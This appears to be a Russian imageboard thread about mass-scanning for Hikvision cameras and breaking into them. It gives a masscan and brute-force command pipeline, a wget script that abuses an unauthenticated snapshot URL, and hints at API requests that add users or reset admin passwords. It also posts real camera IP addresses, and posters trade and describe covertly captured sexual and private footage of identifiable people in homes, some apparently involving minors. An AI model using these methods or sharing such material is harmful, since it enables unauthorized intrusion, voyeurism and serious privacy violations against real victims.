В этом треде проверяем видеорегистраторы и IP камеры Hikvision на простые пароли. О найденных проблемах сообщаем их владельцам. Для этого нам понадобятся блоки IP http://www.iwik.org/ipcountry/ или http://ipgeobase.ru/cgi-bin/AdvSearch.cgi , программы Masscan ( https://github.com/robertdavidgraham/masscan , https://mega.nz/#!R5tXlAZa!IihDrWMrCrXXjZz9nTkyBFDWi3OrClw70Bp_kSn9xv4 ), Grep (http://gnuwin32.sourceforge.net/packages/grep.htm ), Sort (http://gnuwin32.sourceforge.net/packages/coreutils.htm ) и Hikka ( https://github.com/superhacker777/hikka , https://mega.nz/#!34dUgKYb!fIOyCSbPQ7OntbexrvTwsFwIx-ZDFb2WKV6ZxaetU1U ). Запускаем: masscan.exe -p8000 -iL targets.txt --rate=100000 -oX myscan.xml && grep.exe -E -o "([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])" myscan.xml > result.txt && sort.exe -u result.txt > hosts && DEL myscan.xml result.txt && hikka -threads 200 -check -shoots goodВ targets.txt нужно вставить блоки IP. В logins и passwords должны быть ваши логины и пароли. В папку good будут сохранятся изображения с камер. После перебора можно подключиться к видеорегистратору при помощи программы IVMS-4200 http://overseas.hikvision.com/europe/Tools_84.html .Полный список команд hikka:-bf-threads int Bruteforcer threads count (default 1)-check Check cameras (experimental and not fully tested, but very useful)-csv string Write result to CSV-json string Write result to JSON-logins string A file with a list of logins to bruteforce (default "logins")-m3u string Write result to m3u playlist-passwords string A file with a list of passwords to bruteforce (default "passwords")-port int Camera service port (default 8000)-shoots string Download pics from cameras into a folder-threads int Threads count (default 1)Предыдущий тред: >>100102 (OP)
У меня masscan после запуска закрывается.Что делать?
>>104175А у тебя не USB модем? С USB модемами Masscan не работает.
>>104192вифипросто открываю. а он сразу закрывается.
Подтверждаю, не работает. Вылет моментально
Все, допер, выставил в свойствах совместимость с семеркой (я не разбираюсь, но это может выручить) и запуск от имени администратора. Все заработало, уже еду на сгуху.
Чё там, суакпхацкир для 64-ых линупсов не замутил версию? Не собирается до сих пор?
>>104225суперхацкир, лол, фикс
Просканил всю Россию и просматривю скрины. Бл#$%, в какой жопы мы живём!!!
>>104228Всю жопу ты так не увидишь, камеры ставят самые успешные.
Помогите с массканом: когда сканирую диапазоны по этой команде "p8000 -iL targets.txt --rate=1000 -oX myscan.xml", всегда пишет "found=0", хотя Kport справляется отлично. Как это пофиксить?
даешь новые скрины кто че откопал. пора освежить тему
>>104243
О, наше дело еще живёт? Алсо, нескриппи, а сканите ли вы как-нить по 80 пору той же гидрой? Больше ли профит? Интерестно так же, сколько в определенном диапазоне будет камер на 80 порту висеть не имея открытого 8000? Или 80 порт это скорее редкость и его никого не пробрасывают, а бросают онли 8000 порт? Интересно статистическое наблюдение. Дахуа, кстати, достаточно?
>>104253На порт 80 или другие http порта интересно искать в shodan если есть api key.
Красота!
>>104291Ебать, ахуенно. Что за страна?
>>104291США. Этот гандон пароль сменил. Вот тебе ип камеры 73.155.5.177
>>104258Нихуя себе как может!
Украина :)
>>104296>>104308
>>104304Подобрал. Не такой уж и сложный.
Двощ, смотри - я у мамы хаккер :))))#!/usr/bin/env bash#masscan -p8000 -iL hosts --rate=1400 | grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}" > res.txtINC=0while read linedoif wget -O "$line.jpg" --tries=1 --timeout 5 "http://$line/Streaming/channels/1/picture/?auth=YWRtaW46" thenINC=$((INC+1))else rm -f "$line.jpg"fidone < res.txtecho "Done - total: $INC"по мотивам треда в /b
Причесал скриптик - и надо признать довольно лампово получилось.вhttps://github.com/makaka-hacker/kikkaСкрипт по списку скачивает /Streaming/channels/1/picture/?auth=YWRtaW46Количество годноты возросло в разы: тут вам и траходромы в бохатых квартирах и просто пидорашьи конуры и .т.д и т.п.Но:1) часть снимков выходит битая - не только jpg качается2) я хз как в баше потоки организовать - поэтому всего один3) не windows :0 4) Все равно надо добручивать - искать пасс от годной камеры5) bash не айс для таких делДобра анону, который в /b тред создал
>>104362Это у тебя только скрины или подобрал пароль к какой нибудь?
>>104369LOL
>>104370Она его затроллила, а мужик оптимист
>>104225>>104226Зачем она, собственно?>>104229Камеры ставят, в основном, магазины и склады. Причем, в таких тредах только самые нищие магазины и склады, у которых денег не хватило на нормальных специалистов, способных хотя бы пароль поменять.>>104240> p8000-p=8000
admin_12345_171.1.63.154_1Филиал сосача ИРЛ.
>>104362Под винду портируешь?
>>104366Это скрины камер с включенным веб интерфейсом.Снимок с первого канала берется без пароля ( фича хикквижена :D ) В дальнейшем можно попробывать подобрать хиккой или же https://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities>>104408возможно, хотя пока от скрипта толка мало
>>104418портируй под винду пожалуйста
>>104418Нехилая уязвимость. Спасибо анон
Поменял пароль и спи спокойно
>>104394>-p=8000так вообще сразу вырубается, есть другое решение нулевого поиска?
>>104362Ты ловишь по RTSP протоколу?
украинцы смотрят Шария
одна пидофилия в основном
Что у них там? я заинтригован
>>104494более!
>>104385Тот случай, когда толстожопые негры живут лучше тебя, анон.
бордель
Кстати, все эти камеры, обычно ИП камеры одиночки.
В суши-баре смотришь как тебе готовят сашими
Вообщем уязвимость эпическая. Я думаю ее устранят в следующей прошивке.
Остаётся найти метод брута этих камер. Большество из них блокирует ип после 6 попыток так что нужны другие методы.Ксати, пробовал читать стрим через rtsp но там без пароля не проходитrtps://ip:554/Streaming/channels/1/?auth=YWRtaW46
>>104538При чём сдесь rtsp? эти камеры имеют вэб интерфейс. Сканируй восьмидесятые порты.
>>104543Я не про это а про то как видео получить ... Но это не важно теперь так как нашёл как добовлять новый юзер через веб интерфейс. Не работает на все камеры но есть уже успехи.Могу поделиться методом в обмен на годнотуhk.hk.123@mail.ru
>>104543Примерное кол-во теоритически уязвимых устройств.
>>104424Не, под винду не умею - если так уж интересно, то androidфона хватит - даже рут права не нужны>>104481Нет,это просто изображение :( >>104467>>104537Хуйня на самом деле, я попробовал на паре камер -нихуя - видать уязвимы только камеры до 2013-2014 года>>104538-з8000 же хиккой или же прокси>>104543я сканирую сначала 8000 (стандартный порт) а затем 80
>>104528>>104498>>104463>>104457>>104494я не понимаю откуда столько годных камер? прошелся по Россие и Украине, нихуя годного не осталось, все просрали, в том году было лучше. Но этот анон выкладывает откуда-то берет годноту. Вангую что крысы все таки написали прогу которая меняет пароли к массивам новых камер на 8000 и потом крыса из этого массива по новому паролю отбирает годноту? У кого-нибудь есть инфа какой пароль на камерах сейчас?
>>104547Прочитай про уязвимость.
>>104552 У поли сиськи няшные :)
>>104554Камера в хорошем месте
>>104555>>104556>download (43).jpg ты там в ручную что ли скачиваешь?
>>104561Загружаю на ftp сервер, и от туда скачиваю вручную
>>104362Как и на чем это запускать? Где-то в треде мелько про андроидофон, но даже на нем файл kikka вообще не распознается.
А бля скажите как хикку запустить на линуксе? ./hikka? или че за хуйня помогите нубу.
>>104362Спасибо, охуенно.
>>104362собранный masscan из оппоста лежит в папке с киккой и scan.txt, чяднт?
>>104578блядь, гребанная недоось, еще надо установить надо сканер этот
>>104579Ты знаешь толк в извращениях - apt-get install masscan или в скрипте добавлять что-то типа exec $(pwd)/masscan>>104571chmod +x ? ikka алсо права на раздел надо смотреть ) ./?ikka>>104570Из терминала же - https://github.com/makaka-hacker/kikkaИсправил пару ошибок
>>104580>пару ошибоккаких?
Я так понимаю, это камеры RTSP протокола, которые не имеют записи.Если да, то есть отличный брут на C# то есть проблема окон решается по щелчку пальцев, останется только допилить цикличную скачку скринов.Но у этих камер нет записи в 90% случаев.
>>104582Сделаешь для окон?
>>104581Папки "22:01:54" не создавались на FAT разделеСканировал только 8000 порти еще по мелочи>>104582rtsp требует логина и пароля, изображение нет >цикличную скачку скринов#### capture stream"rec" )echo "$2 -> rec_$2"trap "echo EXIT; exit" SIGINTmkdir "rec_$2"while truedoload "$2" "rec_$2/$(date +%s).jpg"done;;Но, есть большой пиздец - камера начинает лагать при большой нагрузке - так что запилить если запилить скачивание в 60 потоков - ей хана Не знаю будет видно на скрине или нет - но часть файлов 0 размера - я так понимаю >>104552 камера двух анонов уже не тянет>>104544Вот об этом поподробнее
>>104584То есть, ты конектишься без лога и пасса?Не вкатываю в твою схему...Получить видео можно не напрягаясь через SDK, кто знает python, на коленках за 3 минуты накатает.
>>104585Думаю для sdk нужен логин и пасс от камеры?а для http://46.50.135.102/Streaming/channels/1/picture/?auth=YWRtaW46 не нужен
>>104587авторизоваться полюбому нужно, это базовая функция. Хотя бы логин но нужен.Ты тупо берешь скрины с первого канала и все? не имея доступа к админке.Камер без логина и пасса не существует. Ты дичь мне втираешь.
>>104589Открой глаза блеать http://46.50.135.102/Streaming/channels/1/picture/?auth=YWRtaW46 > Получить видео можно не напрягаясь через SDK, кто знает python, на коленках за 3 минуты накатает. Так получи видео с той же 46.50.135.102 и нам обьясни - мы только рады будем
>>104591http://46.50.135.102/doc/page/login.asp?_1496491980753открой сам.
>>104592HiWatch - бюджетный бренд, разработанный компанией Hikvision, мировым лидером по производству систем видеонаблюдения.Ну вот и все, теперь я все понял. А то без логина он конектится.
>>104593http://46.50.135.102/Streaming/channels/1/picture/?auth=YWRtaW46 - Я какерhttp://46.50.135.102/Streaming/channels/1/picture/?auth=YWRtaW4 - Ой сломалось:(
>>104594Ты дебил?
>>104595Не объяснишь по пунктам, где я дебил, пойдешь на хуй.
>>104594Маня плз http://base64.ru/
>>104596Все понял о чем ты - нет, мы не брутим admin: Сия хуйня по неизвестной прихоти хиквиженов /Streaming/channels/1/picture/?auth=YWRtaW46 доступна независимо от пароля админа Лучше бы тред почитал внимательно, чем бомбить Юhttp://www.hikvision.msk.ru/forum/26-3729-1
>>104599Я не бомбил, у меня иммунитет к этим тредам:)Короче мини щелочка на получение картинок) Фап-фап по кадрам)
>>104584верни старую версию, у меня ни с того ни с сего во время сохранения скриншотов после 50 насканенных камер обрывается
>>104602Держи https://github.com/makaka-hacker/kikka/blob/9aa1f185a8fe3ff16e846472d2bf1089e1f431fa/kikka Там вроде ничего не изменилось...При какой опции обрывается? ( start или rec ?) Как именно обрывается? Полностью вылетает? Или wget начинает тупить
>>104603start, просто останавливается как будто бы просканировал все хосты. Из 32000 хостов всего 73 скрина (в прошлый раз оборвалось на 56 скринах).Проверил старую версию кикки и тоже самое .rec ip нормально вроде работает, но проскакивают битые скрины, хз из за чего.
>>104604причем проверил ip после которого done - он в 157 строке списка.
Как соединить картинки в видео?
>>104608До 400 снимков- "Киностудия Windows Live" (Windows7). Импорт снимков в нужном порядке и задание длительности каждого из кадров около 0,03 сек. Больше 400, когда эта программа не справляется- "Pinnacle Studio". Всё довольно быстро и качественно, много настроек. Единственное- долго думает при изменении длительности кадров
>>1046>>104608VirtualDub. 1. File –> Open Video File 2. В выпадающем меню типа файла выставляем «Image sequence». 3. Выбираем первый файл. При условии, что картинки пронумерованы по порядку, имеют одинаковое разрешение, формат и не закодированы в неведомый формат он их автоматически подтянет в один ролик. Если ругнется при открытии файла — переконвертируйте их все в BMP, например. 4. Video –> Frame Rate… 5. Выставляем желаемую скорость кадров. 6. Video –> Compression… 7. Выставляем кодек, которым собираемся сжимать поток. 8. File –> Save as AVI… 9. Сохраняем.
>>104605похоже wget дохнетПоявляются ли логи в виде wget-0.log ? Можно попробывать запустить bash +x kikka start твой файлили лучше bash +x kikka brute файл с уже просканенными ip
>>104611>>104610спасибо
Здравствуйте
Аноны сколько камер вы доите одновременно?
>>104616В смысле?
годноты вообще нет.
>>104625нихуя себе нет, встал колом ща
Кстати, >>104584У Полины на камере есть жд. Кому system user создать на этой камере в обмен на годноту? Пишите на hk.hk.123@mail.ru
>>104648>>104647это россия?
>>104654Москва
>>104658пароль стандартный был или ты подбирал?
I uploaded some masscanned countries, so you don't have to.https://mega.nz/#!dgFEBSYK!cckgYmtoNhf7BzC6rNVdlZ4pzE4B5DZftFa_EI4cF-M
Есть что-нибудь гейское?
>>104662>>104648что за мода ебаться под порнуху?
>>104665Когда долго живешь с кем-то, то партнер уже не воспринимается, как сексуальный объект, а скорее, как окружающая обстановка или часть собственного тела, например, рука. Нужно что-то, что возбудит.
>>104661Thanks bro. Huli na pendosckom bazarysh tut&?
>>104663>>104662>>104662Рашка?
>>104664
>>104666> партнер уже не воспринимается, как сексуальный объектпочему? Тяночка же ахуенная на первом видео
>>104671Для тебя охуенная, для него обыденная.
>>104662У них же там иконы!!!Ну что за богохульники!! Содомиты!!!
>>104671На первом видео там шлюша. К ней клиенты заходят
>>104659Я могу добавить нового не зная пыроль админа. До здраствует хиквижн
>>104677Как?
>>104677Это невозможно.
>>104686Опять ты, дебил.
>>104686Дай, ИП и докажу
>>104688Прокатывает с любым хиквиженом или нужна определенная модель/прошивка? Для этого фокуса нужно что бы был разрешен анонимный вход?
>>104693Прокатывает если получяется сделать скрин методом вышеуказаном
>>104694Во всех случаях?
>>104700До сих пор во всех случаях
>>104701Ну, анон, что б тему не палить совсем, намекни хоть куда параметры передавать? А дальше мы уж сами додумаемся
>>104702Дам только один намёк. Читайте документацию PSIA
>>104703ты через GET нового юзверя скармливаешь?
>>104704PUT
>>104705ISAPI/Security или через /doc/page ??
>>104709он врет, наличие возможности посмотреть картину с камеры без доступа в админку - единственная уязвимость, которую прикрыли в новых прошивках.
>>104710Едниственое что не получается, это изменить права нового пользовотеля, то есть после создания он не имеет никаких прав :(По этому приходится просто менять пароль админа. Это делается очень лехко
>>104711ISAPI/Security или через /doc/page ??
>>104711Каким образом ты собираешься добавлять нового пользователя если у тебя нет пароля от admin?
>>104713Security
>>104714А каким оброзом ты качаешь скрин не имеея пароль админа?
>>104713doc/page это просто хтмл странички
>>104711>менять пароль админатолсто, т.к. пароль может сменить только суперпользователь, т.е сам админ.
>>104718?auth=YWRtaW46
>>104716это уязвимость камеры без доступа к видеопотоку, а тем более к настройкам.
>>104720Ну не хочешь верить, не верь ... я больше не буду никого убеждать а просто буду искать годноты. Если ктото сумеет создать ногого пользовотеля с правами просмотра тогда пишите на мыло hk.hk.123@mail.ru
>>104721А как создать нового пользователя без прав?
>>104711если получается сменить пароль админа, то какие-то права все же имеются. Поясни этот момент. Выложи скрин админки со списком пользователей.
>>104723Добавление юзера состоит из двух этапов1. Создание юзера2. Создание правЭто два разных запросов. Первый запрос получается сделать а второй, пока ещё не знаю какЧтобы поменять пароль любого пользовотеля (в том числе админа) используется первый запрос
>>104724напиши запрос
>>104727Это вы уже сами ищите. А то если оставлю сдесь, школьники все камеры просрут
>>104728создай на этой камере пользователя с логином admin паролем 12345
>>104729109.173.79.188отклеилось
>>104730На этой чёто не получается <statusCode>3</statusCode><statusString>Device Error</statusString>
>>104731А ногого создал без проблем: system:system123
>>104732как так?
>>104733Не знаю, первый раз такое. Дай другой ИП
>>104734145.255.18.250
>>104735>145.255.18.250Я понял почему не получалось с предыдущей. Пароль 12345 слишком простой и камера не принимает. Вот поменял пароль админа на 123456789abc
>>104736Это всё через строку браузера делается или нужно знать соснольные команды на linux?
>>104742Я использую curl. Можно также с помощу Postman в Chrome
>>104743Сложно это всё, не могу даже осилить банальное подключение к камере без ввода пароля, вводя в строке браузера: http:\\логин:пароль@айпи:портПерекидывает все равно на главную страницу с формой.
>>104744>http://логин:пароль@айпи:порт/doc/page/main.asp
>>104746все равно выводит стартовую страницу, с незаполненными полями.
>>104747Да, дейстивтельно. Там немножко по другому. Веб интерфейс использует куки для аутентификации
Почему не добавляется новый пользователь?
>>104749Пароль нужно писать в отдельном таге<userName>test</userName><password>123456789abc</password>
>>104750все равно выдает:<statusCode>5</statusCode><statusString>Invalid XML Format</statusString> <subStatusCode>badXmlFormat</subStatusCode>
>>104751Вобшето нужно добовляти по одному юзеру а ты выпихал аж 3 сразу.
>>104752лол, я put и post перепутал, да и вообще уже мозги кипят, чему только не приходится учиться и вникать вуайеристу гуманитарию.
ЮХУУУУ!!!!Получилась добовлять оператора с правом просмотра не торгая админа!!!!
>>104754Круто, как тебе это удалось?
>>104754ты теперь сможешь просматривать любую камеру какую захочешь?
>>104756Только те с которых можно сделать скирн без пароля. Ну раньше тоже мог, но нужно было трогать пароль админа ...
>>104754пили как сделал, хуле
>>104757ты гений, там столько годноты пропадает на этих камерах
>>104759Могу добавить для вас операторов. Вы только давайте ип адресса с годнотой. Например то что выкладывали скрины сдесь
>>104760Ладно, запущу вечером сканер, если найдется годная камера скину тебе на почту скрин.
>>104757Пруфы, Билли, нам нужны пруфы
>>104762Дай ИП и будет пруф
Я не понимаю как можно авторизоваться на камере без пароля admin
Выкидывает на авторизацию при отправке хмл, хотя камеру смотреть можно, чяднт?
>>104764Также как и просматривать скирны
>>104766по логину YWRtaW46 не авторизуется ни в одном из разделов isapi
>>104763Жду
>>104770На каком порту веб интерфейс?
>>104771вроде в этой нет веба. попробуй здесь
>>104773Я ведь обьеснял что проходит только с камерах с каторых можно сделать снимок с методом выше указаном
>>104774Ну я хуй его знает в каких камерах можно сделать снимок с веба. Как это проверить ?
>>104775Прочитай в начале треда
>>104776ой, в пизду еще красноглазить
Как это возможно? Ведь при просмотре картинки с первого канала не происходит авторизации, а если бы она происходила, то при переходе в режим просмотра не запрашивало бы логин и пароль, т.к сведения об успешной авторизации уже хранились в куках
Без авторизации /ISAPI/Security/UserPermission/1 не открыть, а метод с auth - не проходит
>>104778и то что есть баг с просмотром jpg производители сами признали и пофиксили новыми прошивками, но вот авторизация и изменение конфигурации это что-то невообразимое
>>104779И я про то же,не понимаю как это у него получается
пиздит падиочередная аттеншнхорь
>>104494Анон. Хочешь добавлю юзера на эти камеры? Пиши на мыло
>>104785Пожалуйста не пали никому, опять все проебут как джва года назад, теперь камеры в стримах мопса и вольнова.
>>104786Я не палю как добавить. Но могу добавить в обмен на годноту
>>104787Хорошо, только не пали, я вечером тебе закину на почту скрины с камер к которым хотел бы получить доступ. Добра тебе
ОП этого волшебного метода - ХУЙ. У него нихуя не рабоатет. А замутил он это что бы выманивать годноту и кидать. Расходимся
>>104789Если бы кинул когонибудь, уже написали бы здесь
>>104796если бы помог кому-то, то тоже бы написали
чтоб быстрее качали скрины добавьте в конце URL&videoResolutionWidth=640&videoResolutionHeight=480А то есть скрины каторые весят пе 2 МБ
>>104798Так чем больше весят тем лучше качество же.
>>104799Когда брутишь я думаю не так важна качество как скорость ...
>>1047983000 скринов за сутки, максимум 890кб скрин, основная масса меньше 250кб
>>104801Я на 10 тредах качал и 20к в с утра до вечера. Правда у меня своя програ в C++ А ип читая не из файла а из базы данных mysql
>>104802Ты программист?
>>104803Да
>>104803Анонист он)))
Не без того
>>104803Я думал здесь все програмисты
>>104584Антош, запили версию под винду плииз.\Буду тебе годноту на почту кидать.
Возможно я не прав, но некоторые скрины в названии файла с адресом, я ради интереса взял диапазоны где они по идее должны быть, так вот не один адрес не нашелся как порт 8000. раз 5 просканил.
Какие скрины?
>>104816Аноним 27/05/17 Суб 19:07:55 №104362
>>104817http://37.115.37.248/Streaming/channels/1/picture/?auth=YWRtaW46Cканер починяй
>>104825В том то и дело, так показывает, но я же написал, в скане не находит.
>>104826чем сканишь ? И какой командой запускаешь?
>>104787Тоесть ты юзера добавить можешь а годноты найти нет? У кого нибудь кроме него получилось добавить?
Можно ли в хикке сделал вывод списка не пробрученных камер?
>>104832нет.
я так понимаю -bf-threads это колличество потоков на одно камеру-threads а это в общем? Что за опция -check ? Почему она до сих пор эксперементальная? Она просто чекает если камера на заданном порту? Можно ли захуярить вывод только с этой опции?
>>104834Короче вывод я захуярил. hikka -threads 200 -check -csv list Только приходится в нотепаде заменять ,8000 на пустоту.
нихуя ньюфажки подтянулись
а я говорил что набегут школьники олококающие под видосики с кампрaнками на ютабе
>>104836>>104837как же я с вас проиграл. Если вы про 4 поста выше от вас дебилов, то я в в этом треде уже давно сижу. Просто понадобилось получить именно список ип чекнутых на камеру, и которые хикка не смог пробрутить.
сраная ньюфажина давно сидит в треде, бгг. Люди по три года в теме, а она тут в треде давно сидит - и перестала быть сраной ньюфажиной от этогопроиграл он. выиграй хоть раз, долбаеб
чет проиграл
>>104838>>104839лол
>>104839Еще сильнее проиграл с долбаеба.
Инцест или просто молодая с старым???
>>104846непохожи на пидорах
>>104846Эти тоже там порнуху смотрят что ли? Импотенты блядь
>>104848Нет, походу не порнушку, просто фильм или сериал
>>104850А че у нее рука на пизде?
>>104846usa?
>>104852Нет, ITA
>>104853Выложи видео как они ебутся
>>104854Было позовчера но архив короткий
>>104855Жаль.
Когда итальянская лолита хочет секса в 3 чеса ночи а папаша должен идти завтра утром на работу
Для тех кто нашли как добавлять юзеров совет:Добовляйте юзерa только когда хотите просмотреть камеру а в конце удаляйте его. Таким оброзом камера будет долго жить. Я лично так делаю.А ещё смотрите в настройках если камера записана на какойнибудь DDNS.
ты лично дрочишь на пустой экрангде пруфы?
>>104857так он ее не трахнул в итоге? и почему у нее пизда такая волосатая?
>>104858Почему ты все время пишешь как аутист? У тебя с головой всё в порядке?
>>104857дай ip
>>104861Я думал сдесь люди меняются идеями и методами. Если не нравится мои посты тогда идите нахуй и пользуйтесь вашей хиккой или киккой как первобытные.Всем всего хорошого Bye Bye
да-дакидалово не прокатилоулыбаемся и нахуй
>>104860Не трахнул, уснул.А про пизду если хочешь узнать, проскань всю италию, зайди на камеру, включи двухсторонее аудио и спроси лично
>>104863съеби уже отсюда школьник аутист
>>104865Я сейчас швецию сканирую, надеюсь блондинистую няшку найти.
Папаша вернулся в обед покушать а лолита ничего не приготовила а всё ещё лежит в постели.
>>104868Она каждый день дома что ли сидит? Почему не работает или не учится или он ее обеспечивает?
По момему сейчас оттрахает
>>104869Такие детали не знаю, я вчера добыл эту камеру
>>104870ахуеть! пиши видео!
Зачем люди ставят камеру над кроватью? Чем они руководствуются? Смотрят на себя в записи и дрочат?
>>104872Ложная тревога, одевается.Всё равно на камере есть ЖД. Завтра зайду посмотреть архив
>>104871hikkoй или же через веб интерфейс?
>>104874пиздец, а я то рассчитывал подрочить сейчас.
>>104874Походу они оба какието пожарники или спасатели. На футболке написано PA CROCE D'OROТипа залатой крест, что-то похожее на красный крест. Они людям помогают а я блять ....
>>104875веб
>>104877у них на стене фото выблядка, он умер?
>>104879Мэн на него подрачивает и возбуждается, а потом ебет уже эту старуху.
>>104868- ХУЛЕ ТЫ ТУТ РАЗЛЕГЛАСЬ, МРАЗЬ? ПИЗДУЙ В ШКОЛУ! ТЕБЕ ЕЩЕ В ИНСТИТУТ ПОСТУПАТЬ! В ШАРАГУ ХОЧЕШЬ ПОЙТИ КАК ТВОЯ МАМКА?мимо-переводчик
>>104863>Я думал сдесь люди меняются идеями и методами. Ну так поделись методом, хотя бы еще намеков попроще дай. Я же не кулхакер раскручивающий скулю в алиэкспресе, да и вроде не аутист с бхф, но все равно нихуя не понял.
>>104882>еще намеков попроще дайа залупу тебе на воротник не навернуть?
>>104882Ты понимаешь что если я выложу сдесь метод то школота убьёт все камеры?
>>104880Какая бля старуха, ей лет 17-18
>>104884Не забывай про вoльнова, мопса и кампранки, и вспомни 2015 год, тысячи камер и годноты.
>>104886Нельзя дать школошникам с пикабу/мдк проебать всё как всегда.
>>104885лол, дебил в сарказм и относительность не может. >>104886>>104887 да и вообще сагу отключи дебил. >>104884Я понимаю. Поэтому и написал что, дай еще намеков. А лучше дай ip где этот сплоит сработает, а я буду пытаться спрашивать не тупые твои ответы.
>>104884не ведись на жалостливые позывы, такие как он радостно гыгыгыкая меняли пароли на камерах, писали на экране "Вас взломал, Вася777", включали двустороннее аудио и т.д.
>>104884тада хуле ты тут забыл? пруфов никаких, один пиздеж. вроде прощался? вот и пиздуй туда, где школота камеры не убьет, если есть с чем пиздовать, кроме влажных мечтаний
>>104882Нормальный чек выложил бы клевых видосиков, написал "учитесь, сынки" и купался бы в лучах славы - если ни как кул хацкер, то хоть как поставщик годноты для босоты. а тут ебала какая-то
>>104894толсто
>>104895а я и не троллю. вон чувак надыбал камеру в италии - не обломался поделиться. чо, сильно потратился на этом? нет, респект ему. все бы так делали
>>104896так и будут делать, ты просто успокойся и жди годноты.
>>104896Тот кто дабыл камеры в италии и тот кто умеет добовлять юзеров одит и тот же человек
>>104898не пизди, тот пишет без ошибок
пиздец, школоло на каникулах, модеры лучше закрывайте/удаляйте тред
>>104900Действительно, удалите всё, а то меня на душе хреново что залил видос с итальянцев а они жизни спасают
>>104901Стремно наврено на работе для всех казаться святым человеком, спасать чьи-то жизни жизни, а после работы трахать девочку которая во внучки годится
>>104902Они в месте работают
напоминаю почему не стоит поднимать тему камер
>>104905Скрин сам рисовал, леонардо?
Ой блядь, вуайеристы-ноулайферы жалеют счастливую и довольную жизнью пару из солнечной Италии. Тянку явно не принуждают, даже если он ее начальник.
>>104907Ну а нахуй ей какой старикан? Она ебнутая что ли?
>>104906хуенардо
>>104908Ты молодой и неопытный? Тянки очень быстро морально взрослеют. В 18 им уже неинтересно с инфантильными сверстниками, и они для общения и секса выбирают мужиков постарше. В 30 они ментальные бабки с интересами бабок, даже если внешне хорошо выглядят. Ну и природа в них заложила искать опытного взрослого самца, а не сопляка. Не все такие, но многие.
>>104910Ну может лучше с неопытным чем со старым пузатым дедком?
>>104911бабло многое решает......выбирают сами
>>104911Нет, не лучше. Этот мужик в свои 45 абсолютно по всем параметрам обходит 20-летнего, кроме тела, но на внешность тянкам обычно пох.
>>104916>на внешность тянкам обычно похпочему?
>>104917Ты меня спрашиваешь? Я откуда знаю. Так природа устроила. Ну это не значит, что можно чуханом ходить. Тянки в первую очередь смотрят на твой статус, поэтому седина, брюхо и плешивость их не отвращает, так как ими могут обладать солидные уважаемые мужчины.
>>104858>>Добавить юзера то просто, у него нет прав на просмотр даже если добавить как оператора. Вопрос в том как ему эти права предоставить. А пароль на админе сбрасывать не охото, так все камеры проеб@ть можно
>>104919Так делай как крысы, меняй пароль, они скриптом уже все дефолтные пароли поменяли, сегодня запустил хикку и за полчаса 100 штук насканилось, когда раньше за то же время было раз в 10 больше.
>>104919Я не про хикку и дефолтные пассы, Я про другое... баг с auth и т.д, Хикка давно уже не актуальна
>>104918Ты неправильно думаешь о тянках, не все из них продажные шкуры, которые ведутся на статус и деньги.
>>104921дай cveшку
>>104921но сути то это не меняет, что чем больше ажиотажа о теме связанной с камерами тем меньше остается годноты, и такие треды как этот - тому подтверждение, зачем вы подогреваете интерес отдыхающих школьникам, которые возомнили себя мамкиными хацкерами
>>104922Это не продажность в плохом смысле этого слова, им реально нравятся взрослые опытные мужчины, особенно если они чего-то добились. Они харизматичны, умеют обращаться с женщиной, шутить, уверены в себе, у них сложившийся взгляд на жизнь. Сложно объяснить, этот факт надо принять. Я думаю ты зеркалируешь свое ощущение ситуации "вот если бы я с 50-летней теткой ради ее денег", но это не то же самое, совсем не то.
>>104919Так ты ж вроде выше писал что у тебя получилось права добавить? не?Вот это твой пост?>>104754
>>104940нет это не мой пост, может у него и получилось, а я только юзера могу добваить
>>104873Их ставят те, кто пользуется услугами клининга или услугами няничек. Что бы можно было смотреть что делают чужие люди у тебя дома пока тебя нет. А в маленькой спальне ты камеру в какой угол ни повесь, она получится над кроватью
>>104925почему ты так думаешь? ты тян?
>>104942Вангую в этой квартире - камера самая дорогая вещь
>>104942И любители детей
>>104947С 3 проиграл , лолНу, почему люди такие животные?
>>104950в каком смысле животные?
>>104947>>104947ну так любители детей как раз и нанимают няничек
>>104947что у бабы с титьками на 1ой?
>>104953Голый волосатый мужик тресет личинкой человека у себя между ногами
>>104955Ты беременых ни разу не видел?
>>104956Когда у тебя будут дети, поймёшь что это вся херня и нет никоких проблем ни для тебя, ни для малыша
У старика походу больше не встаёт. Помучилась, помучилась и ничего не получилась
>>104959Have you recorded anything?
>>104947fuck of from thread
>>104960>>104961
>>104960No, why asking?
>>104963I was hoping
>>104966>>104964Почему бы и не добавится? и протроянить его под видом новой хикки 3.0.1a
>>104984
Ахуйевший малый
если на камере нет жд, как можно вести запись чтобы не на свой комп?
>>105078находишь левый регистратор со свободными ай-пи каналами и прописываешь туда свою камеру. Потом с него сохраняешь и постишь сюда.
>>104759
>>105079почему у меня по во всех случаях пишет Camera Abnormal и ничего не добавляется? Пробовал добавлять на разные регистраторы камеры разных производителей РВИ, ХК, Нави и т.д.
>>105087
>>105083Под столом :)))))
>>105098Ох, лол!Выкладывай моар, это ахуенно.
>>105098Там вообще женщины бывают?)
>>105101Да, но вместе с парня. Зашла одна пара искали крем для массажа
>>105102>искали крем для массажаего же в аптеках продают
>>105103ты идиот? в какой блядь аптеке?
В любой аптеке продаются креиа лубрикпнты , идиот.Есть что годное?Серфю но пока и выложить нечего
>>105117не пизди, в аптеке только гандоны продают
>>105120Ты в аптеке, когда был последний раз в 2001?
>>10512314.05.2017
>>105124Ну ты серьёзно? В моей мухосрани(15к) в каждой аптеке можно купить смазку. Ты где там блять проживаешь?
>>105126В Перми, а ты?
>>105127Антоновка Белгородская область.
>>105131как ты снял видео с этой камеры?
>>105132там жд
>>105133Не понял, ты записал и теперь кодируешь в вебм. Почему дата не сегодняшняя? Её что блять заблочили?
>>105134Ты прописал туда юзера своего, сбрутил или перенакатил админа со своим паролем? Есть видео как в бидэ подмываются? доставь плз!
>>105138Озабоченный что ли?
>>105131>>105135ну а ты мудак конечно, тебе сказали не постить сюда ничего чтобы школьникам хайп не поднимать, дебил блядь.
>>105140не, просто фетиш у меня такой.
>>105142Фетиш смотреть как кто-то моет жопу?
>>105135Походу камера уже сдохла ..
>>105144больше выкладывай в тред, мудак
>>105143почему жопу? пизду!
>>105144все годные уже здохли, что засветились тут
>>105146Ты хоть знаешь для чего биде нужно?
>>105129Кого блять покупала ? Хуй разберешь
